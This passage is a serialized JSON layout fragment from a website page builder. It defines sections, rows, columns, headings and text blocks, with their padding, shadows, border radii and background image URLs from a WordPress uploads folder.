:\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c4\"]},{\"id\":342,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c5\"]},{\"id\":344,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c6\"]},{\"id\":345,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-ewsimage.png\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c7\"]},{\"id\":346,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c8\"],\"props\":{\"width\":\"full-width\"}},{\"id\":347,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c9\"]},{\"id\":348,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-BeforeSimulCast-1.png\"},\"size\":\"contain\"}],\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c10\"]},{\"id\":349,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":795.9000244140625},\"type\":\"fit-to-content\"}},\"v\":\"1.1\",\"nodes\":[\"126-c11\"]},{\"id\":350,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c12\"]},{\"id\":352,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c13\"]},{\"id\":353,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c14\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":354,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c15\"]},{\"id\":355,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c16\"]},{\"id\":356,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c17\"]},{\"id\":358,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c18\"]},{\"id\":359,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\"},\"position\":\"center center\",\"size\":\"cover\",\"repeat\":\"no-repeat\",\"attachment\":\"scroll\"}],\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c19\"]},{\"id\":360,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c20\"],\"props\":{\"width\":\"full-width\"}},{\"id\":361,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c21\"]},{\"id\":362,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\"}}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c22\"]},{\"id\":363,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c23\"]},{\"id\":364,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c24\"]},{\"id\":366,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c25\"]},{\"id\":367,\"type\":\"hop-content\",\"nodeId\":\"453-c1\",\"nodes\":[\"453-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":368,\"type\":\"hop-content\",\"nodeId\":\"449-c1\",\"nodes\":[\"449-c1\"],\"v\":\"1.1\"},{\"id\":369,\"type\":\"hop-section\",\"nodeId\":\"449-c2\",\"nodes\":[\"449-c2\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":370,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"449-c3\",\"nodes\":[\"449-c3\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":371,\"type\":\"hop-column\",\"nodeId\":\"449-c4\",\"nodes\":[\"449-c4\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":372,\"type\":\"hop-text\",\"nodeId\":\"449-c5\",\"nodes\":[\"449-c5\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]}}},{\"id\":377,\"type\":\"hop-section\",\"nodeId\":\"449-c6\",\"nodes\":[\"449-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":378,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"449-c7\",\"nodes\":[\"449-c3\"],\"v\":\"1.1\"},{\"id\":379,\"type\":\"hop-column\",\"nodeId\":\"449-c8\",\"nodes\":[\"449-c4\"],\"v\":\"1.1\"},{\"id\":380,\"type\":\"hop-text\",\"nodeId\":\"449-c9\",\"nodes\":[\"449-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":381,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c26\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":382,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c27\"]},{\"id\":383,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c28\"]},{\"id\":384,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c29\"]},{\"id\":386,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c30\"]},{\"id\":387,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Opherus.png\"},\"position\":\"center center\",\"size\":\"cover\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c31\"]},{\"id\":388,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c32\"],\"props\":{\"width\":\"full-width\"}},{\"id\":389,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c33\"]},{\"id\":390,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/Picture1.jpg\"},\"position\":{\"x\":77.72398745397518,\"y\":53.316665364481594}}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c34\"]},{\"id\":391,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c35\"]},{\"id\":392,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c36\"]},{\"id\":394,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c37\"]},{\"id\":395,\"type\":\"hop-content\",\"nodeId\":\"185-c1\",\"nodes\":[\"185-c1\"],\"v\":\"1.1\"},{\"id\":396,\"type\":\"hop-section\",\"style\":{\"customHeight\":{\"type\":\"fit-to-content\"},\"separatorTop\":{\"enabled\":false,\"type\":\"opacity-tilt\",\"negative\":false,\"height\":{\"value\":300}},\"background\":{\"overlay\":{\"enabled\":false,\"type\":\"shapeOnly\",\"shape\":{\"value\":\"two-circles\",\"isTile\":false}},\"color\":\"#F5FAFD\"},\"separatorBottom\":{\"enabled\":false,\"type\":\"opacity-tilt\",\"negative\":false,\"height\":{\"value\":300}}},\"props\":{\